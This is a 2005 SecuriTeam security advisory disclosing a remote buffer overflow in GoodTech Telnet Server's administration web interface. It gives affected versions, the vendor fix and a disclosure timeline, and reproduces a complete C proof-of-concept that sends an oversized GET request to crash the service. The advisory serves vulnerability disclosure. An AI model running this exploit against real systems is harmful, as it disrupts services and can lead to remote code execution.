The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
GoodTech Telnet Server Buffer Overflow Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.goodtechsys.com/telnetnt2000.asp> GoodTech Telnet Server
turns "a Windows NT/2000/XP/2003 system into a multi-user Telnet server".
GoodTech's administration web server interface is vulnerable to a remote
buffer overflow, allowing a malicious attacker to run arbitrary commands
on a vulnerable machine.
DETAILS
Vulnerable Systems:
* GoodTech Telnet Server version 5.0.6 and prior
Immune Systems:
* GoodTech Telnet Server version 5.0.7 or newer
The GoodTech program runs an administration web server (default port
2380). By sending a a very long string (10040 bytes) suffixed by two
newline characters, a remote attacker can trigger a buffer overflow
vulnerability, overwriting the instruction pointer and giving the
possibility to execute arbitrary code remotely in the LOCAL_SYSTEM
context.
Proof of Concept Code:
/**********************************
GoodTech Telnet Server Buffer Overflow Crash POC
created by Komrade
e-mail: unsecure(at)altervista(dot)org
web: http://unsecure.altervista.org
Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to
5.0.7)
on a Windows XP Professional sp2 operating system.
This exploit connects to the Administration server of GoodTech Telnet
Server
(default port 2380) and sends a very long string (10040 bytes).
After the exploit is sent the Telnet Server will crash, trying to access
to a bad memory address: 0xDEADCODE.
Usage: gtscrash.exe "IP address"
Options:
"IP address" The IP address of the computer running GoodTech Telnet
Server
**********************************/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
int main(int argc, char **argv)
{
SOCKET sock;
struct sockaddr_in sock_addr;
WSADATA data;
WORD p;
p=MAKEWORD(2,0);
WSAStartup(p,&data);
int i, n, err;
unsigned char *mex;
char risp[4096];
printf("--------------------------------------------\r\n");
printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
printf("\t\t\tcreated by Komrade\r\n\r\n");
printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
printf("\t\tweb: http://unsecure.altervista.org\r\n";);
printf("--------------------------------------------\r\n\r\n");
if (argc < 2){
printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
printf("Options:\r\n");
printf("IP address\tThe IP address of the computer running GoodTech
Telnet Server\r\n");
exit(0);
}
mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);
sock = socket(AF_INET, SOCK_STREAM, 0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(2380); /* Administration web server port */
sock_addr.sin_addr.s_addr= inet_addr(argv[1]);
err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
if(err<0){
printf("Unable to connect() to %s\n", argv[1]);
exit(-1);
}
strcpy (mex, "GET /");
for(i = strlen(mex); i < 10032; i++)
mex[i]= 'a';
mex[i]=0;
strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
strcat(mex, "\r\n\r\n");
printf("Sending %d bytes.....\n\n", strlen(mex));
n=send(sock, mex , strlen(mex), 0);
n=recv(sock, risp, sizeof(risp), 0);
if (n < 0)
printf("GoodTech Telnet Server succesfully crashed!!\n");
else{
risp[n]=0;
printf("%s\n", risp);
}
closesocket(sock);
WSACleanup();
return 0;
}
The original proof of concept code can be found at:
<http://unsecure.altervista.org/security/gtscrash.c.txt>
http://unsecure.altervista.org/security/gtscrash.c.txt
Vendor Status:
Vendor was notified on 14/03/2005. The vendor released a fix in the new
version 5.0.7
See to download the new fixed version.
Disclosure Timeline:
11/03/2005 - Vulnerability found.
14/03/2005 - Vendor contacted.
15/03/2005 - Vendor reply.
15/03/2005 - Vulnerability fixed. A new version of GoodTech Telnet Server
is now available at the vendor's website at: <http://www.goodtechsys.com>
http://www.goodtechsys.com
ADDITIONAL INFORMATION
The information has been provided by <mailto:unsecure@altervista.org>
Komrade.
The original article can be found at:
<http://unsecure.altervista.org/security/goodtechtelnet.htm>
http://unsecure.altervista.org/security/goodtechtelnet.htm
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
